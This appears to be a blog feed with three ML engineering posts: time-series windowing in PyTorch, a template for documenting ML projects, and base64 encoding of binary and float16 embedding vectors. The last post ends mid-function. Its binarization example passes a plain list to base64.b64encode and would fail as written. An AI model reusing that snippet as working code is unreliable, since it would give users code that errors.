Senthilkumar Gopalhttps://sengopal.github.io/2023-10-01T00:00:00-07:00Musings of a machine learning researcher, engineer and leaderFeature data creation for Time Series2023-10-01T00:00:00-07:002023-10-01T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2023-10-01:/posts/feature-data-creation-for-time-series.htmlA quick review of feature creation for time series data.<p>Timeseries data is a list of observations in a constant interval.
This post gives a quick review of how to convert the list of
observations into features and labels to build a ML model to help
predict the next observation.</p>
<h1 id="timeseries-feature-data-extraction">Timeseries feature data
extraction</h1>
<p>For a time series, the feature set is effectively a fixed number of
consecutive values in the list, with the label being the next value. A
window of consecutive observations, whose length is the window size, is
sliced from the data, and an ML model is trained to predict the last
observation of each window from the ones before it. For a time series of
10 observations, we can expand the data set using windowing, where the
window slides forward by a fixed shift at each iteration. Each window is
then split into features and a label, with the last item of the window
being the label for the preceding items. We can also shuffle and batch
the data using a PyTorch DataLoader.</p>
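<p>As a rough illustration of the windowing step on its own, the following plain-Python sketch lists the feature/label pairs for ten observations. The helper name <code>make_windows</code> is hypothetical and is not part of PyTorch; it only mirrors the slicing described above.</p>

```python
# Plain-Python sketch of sliding-window feature/label creation.
# make_windows is a hypothetical helper used only for illustration.
def make_windows(series, window_size, shift=1):
    """Return (features, label) pairs; the last item of each window is the label."""
    pairs = []
    for start in range(0, len(series) - window_size + 1, shift):
        window = series[start:start + window_size]
        pairs.append((window[:-1], window[-1]))
    return pairs


pairs = make_windows(list(range(10)), window_size=5, shift=1)
for features, label in pairs:
    print(features, "->", label)
```

<p>With a window size of 5 and a shift of 1, ten observations yield six windows, each contributing four feature values and one label.</p>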
<div class="sourceCode" id="cb1"><pre class="sourceCode python"><code class="sourceCode python"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a><span class="im">import</span> torch</span>
<span id="cb1-2"><a aria-hidden="true" href="#cb1-2" tabindex="-1"></a><span class="im">from</span> torch.utils.data <span class="im">import</span> TensorDataset, DataLoader</span>
<span id="cb1-3"><a aria-hidden="true" href="#cb1-3" tabindex="-1"></a></span>
<span id="cb1-4"><a aria-hidden="true" href="#cb1-4" tabindex="-1"></a><span class="co"># Generate a PyTorch tensor with numbers 0 to 9</span></span>
<span id="cb1-5"><a aria-hidden="true" href="#cb1-5" tabindex="-1"></a>data <span class="op">=</span> torch.arange(<span class="dv">10</span>)</span>
<span id="cb1-6"><a aria-hidden="true" href="#cb1-6" tabindex="-1"></a></span>
<span id="cb1-7"><a aria-hidden="true" href="#cb1-7" tabindex="-1"></a><span class="co"># Define window size and shift</span></span>
<span id="cb1-8"><a aria-hidden="true" href="#cb1-8" tabindex="-1"></a>window_size <span class="op">=</span> <span class="dv">5</span></span>
<span id="cb1-9"><a aria-hidden="true" href="#cb1-9" tabindex="-1"></a>shift <span class="op">=</span> <span class="dv">1</span></span>
<span id="cb1-10"><a aria-hidden="true" href="#cb1-10" tabindex="-1"></a></span>
<span id="cb1-11"><a aria-hidden="true" href="#cb1-11" tabindex="-1"></a><span class="co"># Window the data and drop remainder</span></span>
<span id="cb1-12"><a aria-hidden="true" href="#cb1-12" tabindex="-1"></a>windows <span class="op">=</span> [data[i:i <span class="op">+</span> window_size] <span class="cf">for</span> i <span class="kw">in</span> <span class="bu">range</span>(<span class="dv">0</span>, <span class="bu">len</span>(data) <span class="op">-</span> window_size <span class="op">+</span> <span class="dv">1</span>, shift)]</span>
<span id="cb1-13"><a aria-hidden="true" href="#cb1-13" tabindex="-1"></a></span>
<span id="cb1-14"><a aria-hidden="true" href="#cb1-14" tabindex="-1"></a><span class="co"># Flatten the windows</span></span>
<span id="cb1-15"><a aria-hidden="true" href="#cb1-15" tabindex="-1"></a>flat_windows <span class="op">=</span> [window.flatten() <span class="cf">for</span> window <span class="kw">in</span> windows]</span>
<span id="cb1-16"><a aria-hidden="true" href="#cb1-16" tabindex="-1"></a></span>
<span id="cb1-17"><a aria-hidden="true" href="#cb1-17" tabindex="-1"></a><span class="co"># Create tuples with features (first four elements of the window) and labels (last element)</span></span>
<span id="cb1-18"><a aria-hidden="true" href="#cb1-18" tabindex="-1"></a>features <span class="op">=</span> [window[:<span class="op">-</span><span class="dv">1</span>] <span class="cf">for</span> window <span class="kw">in</span> flat_windows]</span>
<span id="cb1-19"><a aria-hidden="true" href="#cb1-19" tabindex="-1"></a>labels <span class="op">=</span> [window[<span class="op">-</span><span class="dv">1</span>] <span class="cf">for</span> window <span class="kw">in</span> flat_windows]</span>
<span id="cb1-20"><a aria-hidden="true" href="#cb1-20" tabindex="-1"></a></span>
<span id="cb1-21"><a aria-hidden="true" href="#cb1-21" tabindex="-1"></a><span class="co"># Convert features and labels to PyTorch tensors</span></span>
<span id="cb1-22"><a aria-hidden="true" href="#cb1-22" tabindex="-1"></a>features_tensor <span class="op">=</span> torch.stack(features)</span>
<span id="cb1-23"><a aria-hidden="true" href="#cb1-23" tabindex="-1"></a>labels_tensor <span class="op">=</span> torch.tensor(labels)</span>
<span id="cb1-24"><a aria-hidden="true" href="#cb1-24" tabindex="-1"></a></span>
<span id="cb1-25"><a aria-hidden="true" href="#cb1-25" tabindex="-1"></a><span class="co"># Create a PyTorch dataset</span></span>
<span id="cb1-26"><a aria-hidden="true" href="#cb1-26" tabindex="-1"></a>dataset <span class="op">=</span> TensorDataset(features_tensor, labels_tensor)</span>
<span id="cb1-27"><a aria-hidden="true" href="#cb1-27" tabindex="-1"></a></span>
<span id="cb1-28"><a aria-hidden="true" href="#cb1-28" tabindex="-1"></a><span class="co"># Shuffle the dataset</span></span>
<span id="cb1-29"><a aria-hidden="true" href="#cb1-29" tabindex="-1"></a>shuffle_indices <span class="op">=</span> torch.randperm(<span class="bu">len</span>(dataset))</span>
<span id="cb1-30"><a aria-hidden="true" href="#cb1-30" tabindex="-1"></a>dataset <span class="op">=</span> TensorDataset(features_tensor[shuffle_indices], labels_tensor[shuffle_indices])</span>
<span id="cb1-31"><a aria-hidden="true" href="#cb1-31" tabindex="-1"></a></span>
<span id="cb1-32"><a aria-hidden="true" href="#cb1-32" tabindex="-1"></a><span class="co"># Create a PyTorch DataLoader</span></span>
<span id="cb1-33"><a aria-hidden="true" href="#cb1-33" tabindex="-1"></a>dataloader <span class="op">=</span> DataLoader(dataset, batch_size<span class="op">=</span><span class="dv">2</span>, shuffle<span class="op">=</span><span class="va">True</span>)</span>
<span id="cb1-34"><a aria-hidden="true" href="#cb1-34" tabindex="-1"></a></span>
<span id="cb1-35"><a aria-hidden="true" href="#cb1-35" tabindex="-1"></a><span class="co"># Print the results</span></span>
<span id="cb1-36"><a aria-hidden="true" href="#cb1-36" tabindex="-1"></a><span class="cf">for</span> x, y <span class="kw">in</span> dataloader:</span>
<span id="cb1-37"><a aria-hidden="true" href="#cb1-37" tabindex="-1"></a> <span class="bu">print</span>(<span class="st">"x = "</span>, x.numpy())</span>
<span id="cb1-38"><a aria-hidden="true" href="#cb1-38" tabindex="-1"></a> <span class="bu">print</span>(<span class="st">"y = "</span>, y.numpy())</span>
<span id="cb1-39"><a aria-hidden="true" href="#cb1-39" tabindex="-1"></a> <span class="bu">print</span>()</span></code></pre></div>
<p>The output, for reference (the batch order varies between runs because the data is shuffled):</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb2-1"><a aria-hidden="true" href="#cb2-1" tabindex="-1"></a><span class="ex">x</span> = [[5 6 7 8]</span>
<span id="cb2-2"><a aria-hidden="true" href="#cb2-2" tabindex="-1"></a> <span class="ex">[0</span> 1 2 3]]</span>
<span id="cb2-3"><a aria-hidden="true" href="#cb2-3" tabindex="-1"></a><span class="ex">y</span> = [9 4]</span>
<span id="cb2-4"><a aria-hidden="true" href="#cb2-4" tabindex="-1"></a></span>
<span id="cb2-5"><a aria-hidden="true" href="#cb2-5" tabindex="-1"></a><span class="ex">x</span> = [[1 2 3 4]</span>
<span id="cb2-6"><a aria-hidden="true" href="#cb2-6" tabindex="-1"></a> <span class="ex">[2</span> 3 4 5]]</span>
<span id="cb2-7"><a aria-hidden="true" href="#cb2-7" tabindex="-1"></a><span class="ex">y</span> = [5 6]</span>
<span id="cb2-8"><a aria-hidden="true" href="#cb2-8" tabindex="-1"></a></span>
<span id="cb2-9"><a aria-hidden="true" href="#cb2-9" tabindex="-1"></a><span class="ex">x</span> = [[4 5 6 7]</span>
<span id="cb2-10"><a aria-hidden="true" href="#cb2-10" tabindex="-1"></a> <span class="ex">[3</span> 4 5 6]]</span>
<span id="cb2-11"><a aria-hidden="true" href="#cb2-11" tabindex="-1"></a><span class="ex">y</span> = [8 7]</span></code></pre></div>ML Project Template2023-09-23T00:00:00-07:002023-09-23T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2023-09-23:/posts/ml-project-template.htmlThis post describes a typical machine learning project and ongoing documentation and tracking of its progress.<p>Tracking and documenting an ongoing machine learning project is a
task unto itself. The following is a starting document covering all the
moving parts involved in a machine learning project, which can be
specialized towards a specific application such as a recommendation
system or a ranking capability. A simple forkable copy of this document
is also available at https://github.com/sengopal/ml-project-template.</p>
<h1 id="model-and-research-documentation-template">Model and Research
Documentation Template</h1>
<h1 id="project-root">Project Root</h1>
<p>This document acts as the index README or the landing page for the
machine learning project. The intent is to capture all the necessary
decision making information and related references in one centralized
document.</p>
<h3 id="versions">Versions</h3>
<ul>
<li><code><next version> - <what change happened and which section></code></li>
<li>v1.0 - created on Sept 30, 2023</li>
</ul>
<h2 id="audience">Audience</h2>
<p>A simple list of interested folks. This section can also use the
RASCI (Responsible, Accountable, Supporting, Consulted and Informed)
structure as necessary, and can include external team stakeholders.</p>
<h2 id="goals-and-definitions">1 Goals and Definitions</h2>
<h3 id="business-objectives">1.1 Business Objectives</h3>
<h3 id="vision">1.2 Vision</h3>
<h3 id="impact-metrics">1.3 Impact Metrics</h3>
<p>These are the output business metrics that are targeted for
improvement. For a recommendation system this might be Null and Low
queries, MRR, conversion etc. It is important to identify these
metrics, though the models may not be directly optimized only for these
metrics. <em>These are not the model metrics such as precision or
recall, which will be tracked in the model training section.</em></p>
<h3 id="project-scope">1.4 Project Scope</h3>
<p>This section defines the scope of execution impact, such as
mobile/desktop, geographies planned, experiments identified, user
segments targeted etc.</p>
<h3 id="usecases">1.5 Usecases</h3>
<p>Applications and usecases identified to utilize this feature/model
and the method of consumption.</p>
<h3 id="opportunity-sizing-analysis">1.6 Opportunity Sizing
Analysis</h3>
<p>This section captures the opportunity sizing for each usecase
planned. This identifies the approximate improvements in the input and
output metrics with reasonable assumptions.</p>
<h3 id="current-baseline">1.7 Current Baseline</h3>
<p>This section describes the current status of the output metrics
identified for the opportunity. These act as the baseline against which
model improvements and other hypotheses are measured and tested.</p>
<h3 id="data-reportingbusiness-intelligence-dashboards">1.8 Data
reporting/business intelligence dashboards</h3>
<h2 id="data-analysis">2 Data Analysis</h2>
<h3 id="data-used">2.1 Data used</h3>
<p>Location of the training/validation/test data, data freshness,
SQLs/Hadoop jobs used to create the data.</p>
<h3 id="data-analysis-1">2.2 Data Analysis</h3>
<p>Exploratory analysis of the data being used - their distributions,
any missing data, biases and methods to prevent them. This section also
documents any interesting relationships observed in the data.</p>
<h3 id="data-loading-jobs">2.3 Data loading Jobs</h3>
<p>ETL jobs for data loading and related transformations/conversions</p>
<h3 id="labeled-data-human-annotated-datasets">2.4 Labeled Data / Human
annotated datasets</h3>
<p>Human annotated datasets that act as golden datasets for final model
performance evaluation - their exploratory analysis and locations</p>
<h2 id="machine-learning-model">3 Machine Learning Model</h2>
<h3 id="baselines-for-model-performance">3.1 Baselines for model
performance</h3>
<p>These are the baselines established for model finetuning based on
either off the shelf model weights or any other reference models to be
used as a proxy for the downstream tasks.</p>
<h3 id="literature-review">3.2 Literature review</h3>
<p>This section captures any literature review performed to determine
the variations of models to be experimented with, their related
notebooks etc.</p>
<h3 id="model">3.3 Model &lt;X&gt;</h3>
<blockquote>
<p><code>&lt;X&gt;</code> indicates the model variation being tracked.
These might be numbered, or a simple identifier can be used as well.</p>
</blockquote>
<p>Model architecture, pretrained weights used, finetuning dataset used
(use reference to section 1.2)</p>
<ol type="1">
<li>Find SoTA model for your problem domain (if available) and reproduce
results, then apply to your dataset as a second baseline.</li>
<li>Track Training methods and metrics (Losses, epochs etc.)</li>
<li>MLflow or CometML for Training and hyperparameters tracking</li>
<li>Model checkpoint locations</li>
<li>Model training and inference timings</li>
<li>Hardware configuration used</li>
<li>Dependencies/Libraries - requirements.txt or a docker image</li>
<li>Performance vs. Latency tradeoffs</li>
<li>Model export formats and comparison metrics (e.g., ONNX or
TF-protobuf)</li>
<li>Training improvements (quantizations, smaller model or dimensions)
and comparison metrics</li>
</ol>
<h3 id="model-evaluation">3.4 Model Evaluation</h3>
<ol type="1">
<li>Evaluation Metrics - training, validation and testing</li>
<li>Experiments conducted and results</li>
<li>Hyperparameter experiments and final parameters identified</li>
<li>Streamlit / Gradio Demos</li>
<li>Model Card - https://modelcards.withgoogle.com/face-detection</li>
<li>Github location for the evaluation notebooks</li>
</ol>
<h3 id="inference-deployments">3.5 Inference Deployments</h3>
<p>Pytorch - code format and styleguide - <a class="uri" href="https://github.com/IgorSusmelj/pytorch-styleguide#recommended-code-structure-for-training-your-model">https://github.com/IgorSusmelj/pytorch-styleguide#recommended-code-structure-for-training-your-model</a></p>
<h3 id="ml-operations">4 ML Operations</h3>
<p>This section documents the ML operation pipelines once the model has
been identified. Sub-sections should be created for each of the items
below to track all the necessary information.</p>
<ol type="1">
<li>Data pipeline architecture - landing page to understand the data
flow and dependencies</li>
<li>Infrastructure diagrams
<ul>
<li>for offline batch inference - kafka topics, downstream identifiers,
capacity estimates, frequency of updates</li>
<li>for online inference - APIs, platform used, capacity (throughput and
latency) and cluster size</li>
</ul></li>
<li>Other Integration specific system dependencies</li>
<li>Various modes of operation and specifics - Batch (Offline), Batch
(Online), Realtime</li>
<li>Airflow, Luigi or any other orchestration</li>
<li>Any additional post processing - vector databases, indexing,
quantization etc.</li>
<li>Code changes and Deployments - Source code, K8s pods</li>
<li>Instructions for retraining, bulk inferencing etc.,</li>
</ol>
<h3 id="project-execution-and-rollout-plan">5 Project Execution and
Rollout Plan</h3>
<blockquote>
<p>Ideally this document <strong>should not include</strong> execution
status, which is updated very frequently and represents the current
state of affairs. There are other project management tools for that
purpose.</p>
</blockquote>
<p>This section tracks the intended end state of the model execution and
can also track incremental phases. Phase &lt;X&gt; - Timelines, A/B test,
dependency timelines, Github, Inference endpoints, cURL commands,
notebook links, Jenkins URL, Architecture diagrams, reference to Model
&lt;X&gt; (refer to 3.3)</p>
<h3 id="outcomes-and-monitoring">6 Outcomes and Monitoring</h3>
<p>This section documents the outcomes and results, including the
experiments, the variants tested and observations. There should be a
sub-section for the results of each A/B test variant, its impact and its
guardrail metrics. This section should also document the observations
and further model inputs, and clearly indicate the outcome of each
experiment.</p>
<h3 id="monitoring">6.1 Monitoring</h3>
<p>This section tracks the links to monitor the deployed system and data
health.</p>
<ol type="1">
<li>System Monitoring - for throughput, system health, response time
etc.</li>
<li>Data Monitoring - coverage, data drift, model metrics etc.</li>
</ol>
<h3 id="playbook-for-faqs-and-commonly-known-issues">6.2 Playbook for
FAQs and commonly known issues</h3>
<h3 id="references">7 References</h3>
<p>All other reference links such as 1. Internal documents 2. Refs to
wiki, screenshots, Repos with any sample code 3. External - Inspiring
work, papers for further literature review</p>float16 precision conversion to Base642023-02-20T00:00:00-08:002023-02-20T00:00:00-08:00Senthilkumar Gopaltag:sengopal.github.io,2023-02-20:/posts/float16-precision-conversion-to-base64.htmlThis post discusses the different methods in Python for converting float16 or half-precision floats to base64 and vice versa to ensure lossless transmission of numpy array data.<p>With the advent of vector databases and large model based embeddings,
with dimensions of 768 and 2048, building large scale indexes for
performing ANN search and storing these vectors have become expensive
operations. There are many methods for reducing a vector’s memory
footprint, such as quantization down to int8. Two such widely used
methods are binarization and using half-precision (float16) to store
these vectors. The following are simple code snippets that I collected
from various sources for converting these formats to and from base64 to
ensure lossless transmission over the wire, such as over HTTP services.</p>
<h2 id="binarization">Binarization</h2>
<p>Binarization is a simple method which works well for large
dimensional vectors. There are many ways to define the threshold, such
as the mean or median value per dimension. Below is an example of
storing a binary vector as base64 and back, packed in blocks, where each
block consists of 8 bits.</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode python"><code class="sourceCode python"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a><span class="kw">def</span> base64_to_binary_vec(s):</span>
<span id="cb1-2"><a aria-hidden="true" href="#cb1-2" tabindex="-1"></a> binary <span class="op">=</span> base64.b64decode(s)</span>
<span id="cb1-3"><a aria-hidden="true" href="#cb1-3" tabindex="-1"></a> bits <span class="op">=</span> [<span class="bu">bin</span>(byte)[<span class="dv">2</span>:].zfill(<span class="dv">8</span>) <span class="cf">for</span> byte <span class="kw">in</span> binary]</span>
<span id="cb1-4"><a aria-hidden="true" href="#cb1-4" tabindex="-1"></a> s_bits <span class="op">=</span> <span class="st">''</span>.join(bits)</span>
<span id="cb1-5"><a aria-hidden="true" href="#cb1-5" tabindex="-1"></a> <span class="co"># print(len(s_bits))</span></span>
<span id="cb1-6"><a aria-hidden="true" href="#cb1-6" tabindex="-1"></a> <span class="cf">return</span> s_bits</span>
<span id="cb1-7"><a aria-hidden="true" href="#cb1-7" tabindex="-1"></a></span>
<span id="cb1-8"><a aria-hidden="true" href="#cb1-8" tabindex="-1"></a></span>
<span id="cb1-9"><a aria-hidden="true" href="#cb1-9" tabindex="-1"></a><span class="kw">def</span> convert_binary_tob64(s_vec):</span>
<span id="cb1-10"><a aria-hidden="true" href="#cb1-10" tabindex="-1"></a> <span class="cf">return</span> base64.b64encode(s_vec).decode(<span class="st">"utf-8"</span>)</span>
<span id="cb1-11"><a aria-hidden="true" href="#cb1-11" tabindex="-1"></a></span>
<span id="cb1-12"><a aria-hidden="true" href="#cb1-12" tabindex="-1"></a><span class="kw">def</span> verify_binary_encoding():</span>
<span id="cb1-13"><a aria-hidden="true" href="#cb1-13" tabindex="-1"></a> <span class="co"># binary vector - example 1</span></span>
<span id="cb1-14"><a aria-hidden="true" href="#cb1-14" tabindex="-1"></a> sample_cons_str <span class="op">=</span> <span class="st">"D/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A=="</span></span>
<span id="cb1-15"><a aria-hidden="true" href="#cb1-15" tabindex="-1"></a> <span class="bu">print</span>(base64_to_binary_vec(sample_cons_str))</span>
<span id="cb1-16"><a aria-hidden="true" href="#cb1-16" tabindex="-1"></a></span>
<span id="cb1-17"><a aria-hidden="true" href="#cb1-17" tabindex="-1"></a> <span class="co"># binary vector - example 2</span></span>
<span id="cb1-18"><a aria-hidden="true" href="#cb1-18" tabindex="-1"></a> test_str <span class="op">=</span> <span class="st">'vckIkrUOV/sgvGYNBfCLEimBkRMSSGxA2TESPj7ixDZNofUdJVChxmwDCSKV4TG8EYwQUhOWtRGzMjJ6LbLaVe2nCBJn3wN1LIFwA2ikTpP5DrRCBDFdVYxBkuAKARelzQRNE4QTRLm8WKbMLE1AYLgHpIy1bTtB6tGPRvU6adxDSVjDRlA9XNMlsg0NMB5tRKzLiHoUbwz8B+oNzcC/lA8I3CNyY8JD6kT1eN2Vq+Xt4eTm6AZL3/Cs9lYeG4tjjuzK0ioVMyAaStmsp2MchziKUoYShVQ2qH2HgLoRD9kJjUL7AoBzMivoZTi4jaUfVn6HooiDvAfZt8CpHqxQ0A=='</span></span>
<span id="cb1-19"><a aria-hidden="true" href="#cb1-19" tabindex="-1"></a> <span class="bu">print</span>(base64_to_binary_vec(test_str))</span>
<span id="cb1-20"><a aria-hidden="true" href="#cb1-20" tabindex="-1"></a></span>
<span id="cb1-21"><a aria-hidden="true" href="#cb1-21" tabindex="-1"></a> <span class="co"># binary vector - example 3 - to reconstruct the vector</span></span>
<span id="cb1-22"><a aria-hidden="true" href="#cb1-22" tabindex="-1"></a> s_vec <span class="op">=</span> []</span>
<span id="cb1-23"><a aria-hidden="true" href="#cb1-23" tabindex="-1"></a> <span class="cf">for</span> i <span class="kw">in</span> <span class="bu">range</span>(<span class="dv">0</span>, <span class="dv">2048</span> <span class="op">//</span> (<span class="dv">8</span> <span class="op">*</span> <span class="dv">2</span>)):</span>
<span id="cb1-24"><a aria-hidden="true" href="#cb1-24" tabindex="-1"></a> s_vec <span class="op">+=</span> [<span class="dv">1</span>,<span class="dv">1</span>,<span class="dv">1</span>,<span class="dv">1</span>,<span class="dv">0</span>,<span class="dv">0</span>,<span class="dv">0</span>,<span class="dv">0</span>,<span class="dv">0</span>,<span class="dv">0</span>,<span class="dv">0</span>,<span class="dv">0</span>,<span class="dv">1</span>,<span class="dv">1</span>,<span class="dv">1</span>,<span class="dv">1</span>]</span>
<span id="cb1-25"><a aria-hidden="true" href="#cb1-25" tabindex="-1"></a></span>
<span id="cb1-26"><a aria-hidden="true" href="#cb1-26" tabindex="-1"></a> b64_str <span class="op">=</span> convert_binary_tob64(s_vec)</span>
<span id="cb1-27"><a aria-hidden="true" href="#cb1-27" tabindex="-1"></a> <span class="co"># print(b64_str)</span></span>
<span id="cb1-28"><a aria-hidden="true" href="#cb1-28" tabindex="-1"></a> <span class="cf">assert</span> (b64_str <span class="op">==</span> sample_cons_str)</span>
<span id="cb1-29"><a aria-hidden="true" href="#cb1-29" tabindex="-1"></a></span>
<span id="cb1-30"><a aria-hidden="true" href="#cb1-30" tabindex="-1"></a> s_vec_recreate <span class="op">=</span> base64_to_binary_vec(b64_str)</span>
<span id="cb1-31"><a aria-hidden="true" href="#cb1-31" tabindex="-1"></a> <span class="co"># print(len(s_vec_recreate))</span></span>
<span id="cb1-32"><a aria-hidden="true" href="#cb1-32" tabindex="-1"></a> <span class="co"># print(s_vec_recreate)</span></span>
<span id="cb1-33"><a aria-hidden="true" href="#cb1-33" tabindex="-1"></a> s_vec_expected <span class="op">=</span> <span class="st">''</span>.join([<span class="st">'0'</span> <span class="cf">if</span> val <span class="cf">else</span> <span class="st">'1'</span> <span class="cf">for</span> val <span class="kw">in</span> s_vec])</span>
<span id="cb1-34"><a aria-hidden="true" href="#cb1-34" tabindex="-1"></a> <span class="co"># print(s_vec_expected)</span></span>
<span id="cb1-35"><a aria-hidden="true" href="#cb1-35" tabindex="-1"></a> <span class="cf">assert</span>(s_vec_recreate <span class="op">==</span> s_vec_expected)</span></code></pre></div>
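<p>The thresholding step itself is not shown above. As a minimal sketch, assuming the median of each dimension is used as the threshold, a small set of float vectors could be binarized and packed as follows. The helper names (<code>binarize</code>, <code>bits_to_b64</code>, <code>b64_to_bits</code>) and the toy vectors are hypothetical, and only the Python standard library is used.</p>

```python
import base64
import statistics


def binarize(vectors):
    """Set a bit to 1 where the value exceeds the median of its dimension."""
    thresholds = [statistics.median(dim) for dim in zip(*vectors)]
    return [[1 if v > t else 0 for v, t in zip(vec, thresholds)] for vec in vectors]


def bits_to_b64(bits):
    """Pack bits into 8-bit blocks (most significant bit first) and base64-encode."""
    assert len(bits) % 8 == 0, "pad the vector to a multiple of 8 bits first"
    packed = bytes(
        int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, len(bits), 8)
    )
    return base64.b64encode(packed).decode("utf-8")


def b64_to_bits(s):
    """Inverse of bits_to_b64: decode and expand each byte back into 8 bits."""
    return [int(b) for byte in base64.b64decode(s) for b in format(byte, "08b")]


# Toy 8-dimensional vectors, made up for illustration only
vectors = [
    [0.9, -0.2, 0.4, 0.1, -0.7, 0.3, 0.8, -0.5],
    [0.1, 0.6, -0.3, 0.5, 0.2, -0.9, 0.0, 0.7],
    [-0.4, 0.3, 0.9, -0.6, 0.5, 0.1, -0.2, 0.2],
]
binary_vectors = binarize(vectors)
encoded = [bits_to_b64(bits) for bits in binary_vectors]
decoded = [b64_to_bits(s) for s in encoded]
assert decoded == binary_vectors
```

<p>The round trip is lossless for the bits themselves; the information loss happens once, at the thresholding step.</p>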
<h2 id="float-16-to-base64-conversion">Float 16 to Base64
conversion</h2>
<p>The below is an example of storing a float 16 vector as base64 and
back to the float16 vector without any loss of data.</p>
<p>There are multiple methods for float16 to base64 conversion.</p>
<h3 id="method-1---using-numpy-buffer">Method 1 - using Numpy
buffer</h3>
<div class="sourceCode" id="cb2"><pre class="sourceCode python"><code class="sourceCode python"><span id="cb2-1"><a aria-hidden="true" href="#cb2-1" tabindex="-1"></a><span class="im">import</span> base64</span>
<span id="cb2-2"><a aria-hidden="true" href="#cb2-2" tabindex="-1"></a></span>
<span id="cb2-3"><a aria-hidden="true" href="#cb2-3" tabindex="-1"></a><span class="im">import</span> numpy <span class="im">as</span> np</span>
<span id="cb2-4"><a aria-hidden="true" href="#cb2-4" tabindex="-1"></a></span>
<span id="cb2-5"><a aria-hidden="true" href="#cb2-5" tabindex="-1"></a></span>
<span id="cb2-6"><a aria-hidden="true" href="#cb2-6" tabindex="-1"></a><span class="kw">def</span> convert_f16_to_b64_m1(arr):</span>
<span id="cb2-7"><a aria-hidden="true" href="#cb2-7" tabindex="-1"></a>    <span class="co"># Cast to float16 and encode the raw bytes of the array</span></span>
<span id="cb2-8"><a aria-hidden="true" href="#cb2-8" tabindex="-1"></a>    a <span class="op">=</span> np.array(arr, np.float16)</span>
<span id="cb2-9"><a aria-hidden="true" href="#cb2-9" tabindex="-1"></a>    <span class="cf">return</span> base64.b64encode(a.tobytes())</span>
<span id="cb2-10"><a aria-hidden="true" href="#cb2-10" tabindex="-1"></a></span>
<span id="cb2-11"><a aria-hidden="true" href="#cb2-11" tabindex="-1"></a></span>
<span id="cb2-12"><a aria-hidden="true" href="#cb2-12" tabindex="-1"></a><span class="kw">def</span> convert_b64_to_f16(emb):</span>
<span id="cb2-13"><a aria-hidden="true" href="#cb2-13" tabindex="-1"></a>    <span class="co"># Decode the bytes and reinterpret them as a float16 array</span></span>
<span id="cb2-14"><a aria-hidden="true" href="#cb2-14" tabindex="-1"></a>    binary <span class="op">=</span> base64.b64decode(emb)</span>
<span id="cb2-15"><a aria-hidden="true" href="#cb2-15" tabindex="-1"></a>    <span class="cf">return</span> np.frombuffer(binary, dtype<span class="op">=</span>np.float16)</span>
<span id="cb2-16"><a aria-hidden="true" href="#cb2-16" tabindex="-1"></a></span>
<span id="cb2-17"><a aria-hidden="true" href="#cb2-17" tabindex="-1"></a></span>
<span id="cb2-18"><a aria-hidden="true" href="#cb2-18" tabindex="-1"></a><span class="kw">def</span> verify_f16_encoding_m1():</span>
<span id="cb2-19"><a aria-hidden="true" href="#cb2-19" tabindex="-1"></a>    b64_emb <span class="op">=</span> convert_f16_to_b64_m1([<span class="fl">1.2345</span>])</span>
<span id="cb2-20"><a aria-hidden="true" href="#cb2-20" tabindex="-1"></a>    <span class="cf">assert</span> np.isclose([<span class="fl">1.2345</span>], convert_b64_to_f16(b64_emb), atol<span class="op">=</span><span class="fl">1e-2</span>).<span class="bu">all</span>()</span></code></pre></div>
<h3 id="method-2---using-struct-pack">Method 2 - using Struct pack</h3>
<div class="sourceCode" id="cb3"><pre class="sourceCode python"><code class="sourceCode python"><span id="cb3-1"><a aria-hidden="true" href="#cb3-1" tabindex="-1"></a><span class="im">import</span> struct</span>
<span id="cb3-2"><a aria-hidden="true" href="#cb3-2" tabindex="-1"></a></span>
<span id="cb3-3"><a aria-hidden="true" href="#cb3-3" tabindex="-1"></a></span>
<span id="cb3-4"><a aria-hidden="true" href="#cb3-4" tabindex="-1"></a><span class="kw">def</span> convert_f16_to_b64_m2(arr):</span>
<span id="cb3-5"><a aria-hidden="true" href="#cb3-5" tabindex="-1"></a>    <span class="co"># "e" is the struct format code for a half-precision float, "<" means little-endian;</span></span>
<span id="cb3-6"><a aria-hidden="true" href="#cb3-6" tabindex="-1"></a>    <span class="co"># the count is taken from the input instead of being fixed at 96</span></span>
<span id="cb3-7"><a aria-hidden="true" href="#cb3-7" tabindex="-1"></a>    packer <span class="op">=</span> struct.Struct(<span class="st">f"<{len(arr)}e"</span>)</span>
<span id="cb3-8"><a aria-hidden="true" href="#cb3-8" tabindex="-1"></a>    vector_array <span class="op">=</span> np.array(arr, dtype<span class="op">=</span>np.float16).tolist()</span>
<span id="cb3-9"><a aria-hidden="true" href="#cb3-9" tabindex="-1"></a>    vector_bytes <span class="op">=</span> packer.pack(<span class="op">*</span>vector_array)</span>
<span id="cb3-10"><a aria-hidden="true" href="#cb3-10" tabindex="-1"></a>    <span class="cf">return</span> base64.b64encode(vector_bytes)</span>
<span id="cb3-11"><a aria-hidden="true" href="#cb3-11" tabindex="-1"></a></span>
<span id="cb3-12"><a aria-hidden="true" href="#cb3-12" tabindex="-1"></a></span>
<span id="cb3-13"><a aria-hidden="true" href="#cb3-13" tabindex="-1"></a><span class="kw">def</span> verify_f16_encoding_m2():</span>
<span id="cb3-14"><a aria-hidden="true" href="#cb3-14" tabindex="-1"></a>    arr <span class="op">=</span> np.random.normal(<span class="dv">0</span>, <span class="fl">0.01</span>, <span class="dv">96</span>).astype(<span class="st">'float16'</span>)</span>
